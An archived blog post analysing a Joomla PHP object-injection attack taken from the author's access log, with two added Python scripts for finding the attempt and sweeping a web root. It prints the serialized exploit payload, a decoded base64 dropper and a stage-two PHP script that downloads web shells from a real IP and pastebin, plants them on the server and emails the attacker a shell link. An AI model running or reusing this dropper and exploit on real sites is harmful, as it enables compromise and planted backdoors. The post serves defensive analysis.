Content Notice!

This post is really old and no longer reflects my skill level, views or opinions. It is made available here for archival purposes (it was originally on my old WordPress blog).

Keep that in mind when you read the contents within.

Reversing an attempted Joomla Vulnerability Attack

I looked through my access log a little while ago and found some script kiddie trying to attack my non-Joomla site with the latest and greatest Joomla exploit. The whole payload is crammed into the User-Agent field of the request:

64.40.156.51 - - [11/Feb/2016:00:18:58 -0500] "GET / HTTP/1.1" 301 1147 "-" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"000disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:3950:"eval(base64_decode('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'));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"000connection";b:1;}ðýýý"
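If you want to hunt for the same attempt in your own access logs, here is an added example (Python, not code from the original post or from Joomla). It parses combined-format log lines, flags a User-Agent that carries a serialized PHP object or an eval(base64_decode('...')) chain, unwraps the nested base64 stages the way the post does by hand further down, and pulls out any URLs the decoded stages reference. The log lines, hosts and payload stages it runs on are constructed (the real inner payload is not reproduced); the regexes, indicator names and function names are my own.

```python
import base64
import binascii
import re

# Apache "combined" log format. The last quoted field is the User-Agent; the
# serialized payload itself contains double quotes, so that field is matched
# greedily up to the final quote on the line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"\s*$'
)
# A serialized PHP object (O:21:"JDatabaseDriverMysqli":3:{ ...) has no business
# in a User-Agent header; eval(base64_decode('...')) is the second tell.
SERIALIZED_OBJECT_RE = re.compile(r'O:\d+:"[A-Za-z0-9_\\]+":\d+:\{')
EVAL_B64_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*'")
B64_LITERAL_RE = re.compile(r"base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def decode_stages(text, max_depth=5):
    """Follow nested base64_decode('...') literals; return each decoded stage in order."""
    stages = []
    current = text
    for _ in range(max_depth):
        m = B64_LITERAL_RE.search(current)
        if not m:
            break
        try:
            current = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            break  # the literal is not valid base64: stop rather than chase garbage
        stages.append(current)
    return stages


def analyse_line(line):
    """Return None for an ordinary request, else a dict describing the attempt."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ua = m.group("ua")
    indicators = []
    if SERIALIZED_OBJECT_RE.search(ua):
        indicators.append("serialized_php_object_in_user_agent")
    if EVAL_B64_RE.search(ua):
        indicators.append("eval_base64_decode")
    if not indicators:
        return None
    stages = decode_stages(ua)
    # URLs pulled out of the decoded stages are the download locations to block / hunt for
    urls = sorted({u for s in stages for u in URL_RE.findall(s)})
    return {
        "ip": m.group("ip"),
        "time": m.group("time"),
        "status": int(m.group("status")),
        "indicators": indicators,
        "stages": stages,
        "urls": urls,
    }


# --- Constructed sample (not the real dropper) ---------------------------------
# Two harmless nested stages shaped like the payload in the post, so the decoder
# has something to unwrap. Hosts are TEST-NET addresses.
STAGE2 = "<?php $t = http_get('http://203.0.113.9/constructed/stage.txt'); echo 'constructed'; ?>"
STAGE1 = ("$fp=fopen('/tmp/constructed.php','w+');fwrite($fp,base64_decode('"
          + base64.b64encode(STAGE2.encode()).decode() + "'));fclose($fp);")
_feed_url = ("eval(base64_decode('" + base64.b64encode(STAGE1.encode()).decode()
             + "'));JFactory::getConfig();exit")
SAMPLE_UA = ('}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}'
             's:8:"feed_url";s:' + str(len(_feed_url)) + ':"' + _feed_url + '";'
             's:19:"cache_name_function";s:6:"assert";}')
SAMPLE_LINE = ('203.0.113.7 - - [11/Feb/2016:00:18:58 -0500] "GET / HTTP/1.1" 301 1147 "-" "'
               + SAMPLE_UA + '"')
BENIGN_LINE = ('198.51.100.4 - - [11/Feb/2016:00:20:01 -0500] "GET /index.php HTTP/1.1" 200 5120 '
               '"-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/44.0"')

if __name__ == "__main__":
    import json
    import sys
    # Usage: python joomla_ua_hunt.py access.log   (no argument: run on the constructed sample)
    lines = open(sys.argv[1], errors="replace") if len(sys.argv) > 1 else [SAMPLE_LINE, BENIGN_LINE]
    for line in lines:
        hit = analyse_line(line.rstrip("\n"))
        if hit:
            print(json.dumps(hit, indent=2))
```

The decoder deliberately stops at the first literal that is not valid base64 and caps the nesting depth, so a log full of junk cannot send it chasing garbage; in practice the interesting output is the list of URLs, which is what you feed to your egress blocklist and your file-system sweep.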

Since I like to fuck about with stuff, I decided I'd look a little deeper into it. I know the payload is Base64 encoded, so I ran it through a base64 decode tool and it returned this:

// Stage 1 (decoded from the User-Agent payload): writes a second, base64-encoded
// stage out to <docroot>/libraries/lol.php
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode('PD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2xpYnJhcmllcy9qb29tbGEvY3NzLnBocCIgOw0KJHRleHQgPSBodHRwX2dldCgnaHR0cDovLzE2Ni42Mi4xMDIuMjMyL353b3Jrc3BhY2UvbGliL2Nzcy50eHQnKTsNCiRvcGVuID0gZm9wZW4oJGNoZWNrLCAndycpOw0KZndyaXRlKCRvcGVuLCAkdGV4dCk7DQpmY2xvc2UoJG9wZW4pOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7DQogICAgZWNobyAkY2hlY2suIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQokY2hlY2syID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9qbWFpbC5waHAiIDsNCiR0ZXh0MiA9IGh0dHBfZ2V0KCdodHRwOi8vMTY2LjYyLjEwMi4yMzIvfndvcmtzcGFjZS9saWIvbS50eHQnKTsNCiRvcGVuMiA9IGZvcGVuKCRjaGVjazIsICd3Jyk7DQpmd3JpdGUoJG9wZW4yLCAkdGV4dDIpOw0KZmNsb3NlKCRvcGVuMik7DQppZihmaWxlX2V4aXN0cygkY2hlY2syKSl7DQogICAgZWNobyAkY2hlY2syLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzMiI7DQplY2hvICJkb25lMiAuXG4gIiA7DQoNCiRjaGVjazM9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvYS5odG0iIDsNCiR0ZXh0MyA9IGh0dHBfZ2V0KCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9uQnNKaFc3OCcpOw0KJG9wMz1mb3BlbigkY2hlY2szLCAndycpOw0KZndyaXRlKCRvcDMsJHRleHQzKTsNCmZjbG9zZSgkb3AzKTsNCg0KJGNoZWNrND0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2NoZWNrLnBocCIgOw0KJHRleHQ0ID0gaHR0cF9nZXQoJ2h0dHA6Ly8xNjYuNjIuMTAyLjIzMi9+d29ya3NwYWNlL2xpYi9jLnR4dCcpOw0KJG9wND1mb3BlbigkY2hlY2s0LCAndycpOw0KZndyaXRlKCRvcDQsJHRleHQ0KTsNCmZjbG9zZSgkb3A0KTsNCg0KJGNoZWNrNT0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlscy5waHAiIDsNCiR0ZXh0NSA9IGh0dHBfZ2V0KCdodHRwOi8vMTY2LjYyLjEwMi4yMzIvfndvcmtzcGFjZS9saWIvbW0udHh0Jyk7DQokb3A1PWZvcGVuKCRjaGVjazUsICd3Jyk7DQpmd3JpdGUoJG9wNSwkdGV4dDUpOw0KZmNsb3NlKCRvcDUpOw0KDQokY2hlY2s2PSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2xpYnJhcmllcy9qb29tbGEvc2Vzc2lvbi9zZXNzaW9uLnBocCIgOw0KJHRleHQ2ID0gaHR0cF9nZXQoJ2h0dHA6Ly9wYXN0ZWJpbi5jb20vcmF3L1VIQUdUODg3Jyk7DQokb3A2PWZvcGVuKCRjaGVjazYsICd3Jyk7DQpmd3JpdGUoJG9wNiwkdGV4dDYpOw0KZmNsb3NlKCRvcDYpOw0KDQokdG96ID0gImZlb2Zlb3o0NDNAZ21haWwuY29tLCBmZW9mZW96NDQzQG91dGxvb2suY29tIjsNCiRzdWJqZWN0ID0gJ0dpZnQgZnJvbSBBTGZhIEpvbSB6enogJyAuICRfU0VSVkVSWydTRVJWRVJfTkFNRSddOw0KJGhlYWRlciA9ICdmcm9tOiBBbGZhYmV0b1ZpcnR1YWwgLCB0aGFua3MgV2FsZSA8ZmVvZmVvejQ0M0BnbWFpbC5jb20+JyAuICJcclxuIjsNCiRtZXNzYWdlID0gIlNoZWxseiA6IGh0dHA6Ly8iIC4gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10gLiAiL2xpYnJhcmllcy9qb29tbGEvam1haWwucGhwP3UiIC4gIlxyXG4iIC4gcGhwX3VuYW1lKCkgLiAiXHJcbiI7DQokc2VudG1haWwgPSBAbWFpbCgkdG96LCAkc3ViamVjdCwgJG1lc3NhZ2UsICRoZWFkZXIpOw0KDQpAdW5saW5rKF9fRklMRV9fKTsNCg0KDQo/Pg=='));
fclose($fp);

That decodes some other base64 shit and writes it out to a second file, libraries/lol.php, which contains the following code:

<?php
// Stage 2 (libraries/lol.php): fetches six remote files, writes them under the
// document root, mails the attacker the location, then deletes itself.
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im); // unreachable: sits after the return, so the handle is never closed
}

// Shell #1
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/css.php" ;
$text = http_get('http://166.62.102.232/~workspace/lib/css.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else
  {echo "not exits";}
echo "done .\n " ;

// Shell #2 (this is the one the e-mail below links to)
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://166.62.102.232/~workspace/lib/m.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else
  {echo "not exits2";}
echo "done2 .\n " ;

// Defacement page, pulled from pastebin
$check3=$_SERVER['DOCUMENT_ROOT'] . "/a.htm" ;
$text3 = http_get('http://pastebin.com/raw/nBsJhW78');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

// Shell #3
$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://166.62.102.232/~workspace/lib/c.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

// Shell #4
$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://166.62.102.232/~workspace/lib/mm.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

// Shell #5, overwriting a path inside the Joomla session library
$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/session/session.php" ;
$text6 = http_get('http://pastebin.com/raw/UHAGT887');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);

// Phone home: link to the dropped shell plus the server's uname
$toz = "feofeoz443@gmail.com, feofeoz443@outlook.com";
$subject = 'Gift from ALfa Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: AlfabetoVirtual , thanks Wale <feofeoz443@gmail.com>' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);

// Remove the dropper itself
@unlink(__FILE__);

?>

Now, I could spend my time talking about the poor code style, the horrible variable names, the suppression of errors by sticking @ in front of functions, and how some idiot decided to close the curl session after returning the result of the request (so curl_close() never runs)...

Or I could not give a fuck and move on..

The script then tries to download web shell code from 6 different locations and save each one to a file under the document root. The sites hosting the shells are taken down now, but they were just hosting the generic WSO 2.5 shell anyway, standard stuff..
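For the clean-up side, here is an added example (Python, not from the original post or from Joomla) of the triage a site owner would run after seeing this request: it walks a web root, flags the paths the decoded dropper writes to, and flags any file carrying the dropper's own markers (an eval(base64_decode(...)) chain, a self-deleting @unlink(__FILE__), or curl output written straight to disk). The sample tree it builds is constructed; the marker names and functions are mine. Some of the dropped paths may coincide with legitimate core files in some Joomla versions, so a path hit means compare the file against a clean install rather than delete it on sight.

```python
import re
import tempfile
from pathlib import Path

# Relative paths the decoded dropper writes to (taken from the post).
DROPPED_PATHS = {
    "libraries/lol.php",
    "libraries/joomla/css.php",
    "libraries/joomla/jmail.php",
    "libraries/joomla/check.php",
    "libraries/joomla/jmails.php",
    "libraries/joomla/session/session.php",
    "a.htm",
}
# Content markers lifted from the dropper itself; names are my own.
CONTENT_MARKERS = {
    "eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "self_delete": re.compile(r"@?unlink\s*\(\s*__FILE__\s*\)"),
    "remote_fetch_to_file": re.compile(r"curl_init\s*\(.*?\).*?fwrite\s*\(", re.S),
}
SCAN_SUFFIXES = {".php", ".phtml", ".htm", ".html", ".txt"}


def scan_file(path, rel):
    """Return the list of reasons a file deserves a look (empty list = nothing found)."""
    reasons = []
    if rel in DROPPED_PATHS:
        reasons.append("known_dropped_path")
    if path.suffix.lower() in SCAN_SUFFIXES:
        try:
            text = path.read_text(errors="replace")
        except OSError:
            return reasons
        for name, rx in CONTENT_MARKERS.items():
            if rx.search(text):
                reasons.append(name)
    return reasons


def scan_webroot(root):
    """Walk a web root and return [{'path': <relative path>, 'reasons': [...]}, ...]."""
    root = Path(root)
    findings = []
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        reasons = scan_file(p, rel)
        if reasons:
            findings.append({"path": rel, "reasons": reasons})
    return findings


def build_constructed_webroot():
    """Constructed tree for the demo: a clean index.php plus two planted files."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    (root / "libraries" / "joomla").mkdir(parents=True)
    (root / "images").mkdir()
    (root / "index.php").write_text("<?php echo 'clean site'; ?>\n")
    # Planted at a known dropped path, with two of the markers (base64 of "constructed")
    (root / "libraries" / "joomla" / "jmail.php").write_text(
        "<?php eval(base64_decode('Y29uc3RydWN0ZWQ=')); @unlink(__FILE__); ?>\n")
    # Planted elsewhere; only the fetch-and-write pattern gives it away (TEST-NET host)
    (root / "images" / "cache.php").write_text(
        "<?php $c = curl_init('http://203.0.113.9/x.txt'); "
        "$f = fopen('x.php','w'); fwrite($f, curl_exec($c)); ?>\n")
    return root


if __name__ == "__main__":
    import sys
    # Usage: python joomla_drop_sweep.py /var/www/site   (no argument: scan the constructed tree)
    target = sys.argv[1] if len(sys.argv) > 1 else build_constructed_webroot()
    for hit in scan_webroot(target):
        print(hit["path"], ",".join(hit["reasons"]))
```

Run it against the real web root, then hash-compare every flagged file against the matching file from a clean download of your Joomla version before deleting anything; the content markers are deliberately narrow so the output stays short enough to actually read.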

The script then sends an email to feofeoz443@gmail.com and feofeoz443@outlook.com with a link to the shell and a cute message. It is sent under the alias "AlfabetoVirtual", which seems to be quite an active douchebag website-defacing group on Zone-H, a "hey look I defaced this website trolololz" bragging site for little kids with nothing better to do.

The attack most likely originates from an automated scanner running on a Windows box: according to ARIN's Whois lookup tool, the IP range is assigned to Alentus, a hosting company that seems to provide mainly Windows hosting services.

If you are reading this Alfabeto, come at me, braah :*

P.S. If you have not yet updated your Joomla install, read this page.